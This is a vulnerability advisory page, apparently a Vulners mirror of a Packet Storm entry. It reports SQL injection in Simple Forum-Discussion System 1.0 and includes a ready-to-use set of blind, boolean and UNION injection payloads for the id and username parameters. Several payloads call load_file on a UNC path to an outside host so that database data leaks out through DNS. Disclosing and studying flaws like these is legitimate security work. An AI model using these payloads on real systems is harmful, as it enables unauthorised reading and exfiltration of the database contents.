Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Simple Forum-Discussion System 1.0 SQL Injection

🗓️ 13 Dec 2021 00:00:00Reported by nu11secur1tyType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 163 Views

Multiple SQL-Injections in Simple Forum-Discussion System 1.0 on manage_topic.php, manage_user.php, and ajax.php allowing retrieval of database informatio

Code
`## [Simple Forum-Discussion System  
1.0](https://www.sourcecodester.com/php/14525/simple-forumdiscussion-system-using-phpmysql-source-code.html)  
  
## [Vendor](https://www.sourcecodester.com/users/tips23)  
  
![](https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/oretnom23/Forum-Discussion-System-1.0/docs/forum.png)  
  
## Description:  
Multiple SQL-Injections are found on Simple Forum-Discussion System  
1.0 For example on three applications which are manage_topic.php,  
manage_user.php, and ajax.php. The attacker can be retrieving all  
information from the database of this system by using this  
vulnerability.  
  
  
[+]Payloads:  
  
```mysql  
Parameter: id (GET)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=(select  
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))  
AND (SELECT 4985 FROM (SELECT(SLEEP(5)))Eggb)  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 4 columns  
Payload: id=(select  
load_file('\\\\c7kvyxxyc2i5yh8l3p6byhxtxk3drff6hu8hy5n.nu11secur1tyPenetrationTestingEngineer.net\\nix'))  
UNION ALL SELECT  
NULL,NULL,CONCAT(0x7162627871,0x564c7a5164475979514c4879487159576946726147756c7746504d696a5a6c6554547345776f4d61,0x716a7a7171),NULL,NULL,NULL--  
-  
```  
  
  
```mysql  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: id=135628119 or 8604=08604 AND 5328=5328&mtype=own  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: id=135628119 or 8604=08604 AND (SELECT 6263 FROM  
(SELECT(SLEEP(5)))lewZ)&mtype=own  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 5 columns  
Payload: id=-6332 UNION ALL SELECT  
CONCAT(0x7176766b71,0x4b717847474f67485458796b544c50486c656e637779445a6c506b63756d564a544f665364557772,0x7171707871),NULL,NULL,NULL,NULL--  
-&mtype=own  
```  
  
  
```mysql  
Parameter: username (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: username=GnxaCRMw'+(select  
load_file('\\\\p2s8tasb7fditu3yy21otus6sxyqmjg77av2is6h.nu11secur1tyPenetrationTestingEngineer.net\\fnu'))+''  
AND (SELECT 1271 FROM (SELECT(SLEEP(5)))MBvz) AND  
'eIbF'='eIbF&password=t4F!v8o!H8  
```  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Forum-Discussion-System-1.0)  
  
## Proof and Exploit:  
[href](https://streamable.com/439w8c)  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Dec 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
sql-injectionssimple forum-discussion systemajaxmysqlvulnerabilityexploitproof
163